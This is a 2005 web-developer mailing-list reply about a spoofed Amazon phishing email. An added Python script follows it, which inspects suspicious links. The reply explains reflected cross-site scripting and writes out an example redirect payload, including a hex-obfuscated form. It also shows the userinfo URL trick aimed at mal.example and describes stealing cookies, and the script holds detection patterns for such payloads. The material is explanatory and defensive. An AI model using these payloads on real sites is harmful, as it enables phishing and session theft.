[thelist] phishing and urls

Chris at globet.com
Fri Sep 9 12:23:12 CDT 2005


Laura

> This morning I got a phishing email supposedly from amazon.com.
> 
> I knew it was phishing, of course, because it had that famous 
> line "your account will close within 24 hours unless you 
> click on his link and verify your information".
> 
> What scared me particularly on this phish was this - I 
> clicked on the link 

I would advise that if you know that a link is provided in malice,
curiosity should be outweighed by caution. It doesn't matter what you
think you know, if you're about to become the victim of a 0-day exploit.

> (I often check to see where a phisher 
> wants to take me, and the url given was definitely an 
> amazon.com address! (Many phishers will lead you to a 

When you say that it was definitely an Amazon.com address, 1) was the
URI under the amazon.com domain, or 2) did the URI have the string
"amazon.com" in it (possibly at the beginning) somewhere?

If:

1) There is a possibility (probably remote with an organisation like
Amazon.com) that their website is vulnerable to a cross-site scripting
vulnerability. 

Example: The target website has an account login system. When a user
logs out, they are redirected to the target website home page. A message
is displayed which reads "Thank you for logging out". The message is
passed via the query string, so the URI is constructed thus:
http://example.example/default.asp?message=Thank+you+for+logging+out. An
attacker can now insert script into html page that is sent to a user as
an HTTP response if they can persuade the user to click on a link. Thus,
a malicious URI might be constructed thus:
http://example.example/default.asp?message=<script>document.location='mal.example/default.asp'</script>.
It seems pretty clear what is going on here, but if we convert the query
string to hex, it looks like this:
<http://example.example/default.asp?6D6573736167653D3C7363726970743E646F63756D656E742E6C6F636174696F6E3D276D616C2E6578616D706C652F64656661756C742E617370273C2F7363726970743E>.
This would appear to be far less
suspicious, in my opinion. If the link is clicked on, the user is
directed to the attacker's website. They can then be directed straight
back to the target website without the user being any the wiser. Bearing
in mind that attacker can pick up the cookie values from the target
website on the way, and deliver them to himself via the querystring,
this is not cool.

2) The protocol for logging into a website directly is (or used to be,
at least) http://username:password@domain.tld/. If a non-existent
username is specified, the anonymous web user account may be used. Thus,
we could use the link http://amazon.com:password@mal.example/.

Both of the above "exploits" are well known, so most websites *should*
not be susceptible to them.

[..]

> 4. I thought you would be safe from viruses and unauthorized 
> changes to your system if you don't click on any attachments. 
> How does an email transfer a virus or a command if you don't 
> click on an attachment? What are the new rules for keeping 
> your computer safe?

Don't connect it to the interweb? Other than that, install a firewall
and disable *everything*. Then, only enable what you need - and
understand why you need it otherwise leave it disabled. Keep your virus
definitions up to date. Don't let curiosity get the better of you - if
you know that something is malicious, totally avoid it. Assuming you're
on a Windows machine, buy a copy of Norton Ghost. Keep your data on a
separate partition to your OS and applications, and take regular Ghost
backups of your system partition. Then, if something Bad happens, you
should be able to yank the plug, and restore your system partition from
the Ghost image. Of course, your data partition could still be corrupted
- but you can cross that bridge when you come to it.

HTH

Chris Marsh
Web Developer
http://www.globet.com/
Tel: +44 20 8246 4804 Ext 828
Fax: +44 20 8246 4808

Any opinions expressed in this email are those of the individual and not
necessarily the Company. This message is intended for the use of the
individual or entity to which it is addressed and may contain
information that is confidential and privileged and exempt from
disclosure under applicable law. If the reader of this message is not
the intended recipient, you are hereby notified that any dissemination,
distribution, or copying of this communication is strictly prohibited.
If you have received this communication in error, please contact the
sender immediately and delete it from your system. 
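The two link checks discussed in the reply above, as an added example that is not code from the original post or from globet.com: it reports the host a browser would actually connect to (anything before "@" is userinfo, not the host) and decodes a percent- or hex-encoded query string to see what a reflected parameter really carries. The sample links are constructed from the URIs in the message; the `example.example` and `mal.example` names are the ones used there.

```python
"""Triage a link from a suspected phishing message: which host would the
browser really contact, and what does the query string decode to?"""
import re
from urllib.parse import unquote_plus, urlsplit

# Markers of script being reflected through a parameter (a triage check,
# not an exhaustive XSS detector).
SCRIPT_RE = re.compile(r"<\s*/?\s*script|javascript:|document\.(location|cookie)", re.I)

def decode_query(query: str) -> str:
    """Undo percent-encoding; if the whole query is one bare hex string, as in
    the obfuscated link from the message, decode that as well."""
    q = unquote_plus(query)
    if q and len(q) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", q):
        q = bytes.fromhex(q).decode("latin-1")   # latin-1 never raises
    return q

def inspect_link(url: str, expected_domain: str) -> dict:
    """Return the real host plus warning flags for the link."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()       # userinfo before '@' is dropped
    userinfo = parts.username or ""
    expected = expected_domain.lower()
    decoded = decode_query(parts.query)
    return {
        "host": host,
        "on_expected_domain": host == expected or host.endswith("." + expected),
        "userinfo": userinfo,
        "userinfo_mimics_domain": expected in userinfo.lower(),
        "decoded_query": decoded,
        "script_in_query": bool(SCRIPT_RE.search(decoded)),
    }

# Constructed samples: the three links discussed in the message, paired with
# the domain each one claims to belong to.
SAMPLE_LINKS = [
    ("http://example.example/default.asp?message=Thank+you+for+logging+out",
     "example.example"),
    ("http://example.example/default.asp?6D6573736167653D3C7363726970743E646F"
     "63756D656E742E6C6F636174696F6E3D276D616C2E6578616D706C652F64656661756C74"
     "2E617370273C2F7363726970743E", "example.example"),
    ("http://amazon.com:password@mal.example/", "amazon.com"),
]

if __name__ == "__main__":
    for link, claimed in SAMPLE_LINKS:
        print(inspect_link(link, claimed))
```

The third sample lands on `mal.example` with `amazon.com` reported only as userinfo, and the second decodes to the same `<script>` payload as the readable link, so both flags fire on exactly the cases the message describes.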